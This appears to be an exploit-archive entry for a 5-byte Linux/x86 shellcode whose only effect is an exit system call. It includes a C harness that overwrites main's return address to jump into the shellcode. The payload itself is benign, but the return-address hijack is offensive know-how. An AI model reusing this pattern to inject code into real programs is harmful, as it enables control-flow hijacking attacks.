Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)



EKU-ID: 20124 CVE: OSVDB-ID:
Author: izik Published: 2006-01-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
 * (linux/x86) normal exit w/ random (so to speak) return value - 5 bytes
 * - izik <izik@tty64.org>
 */

char shellcode[] = 

	"\x31\xc0"              // xor %eax,%eax 
	"\x40"                  // inc %eax 
	"\xcd\x80";             // int $0x80 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}

// milw0rm.com [2006-01-21]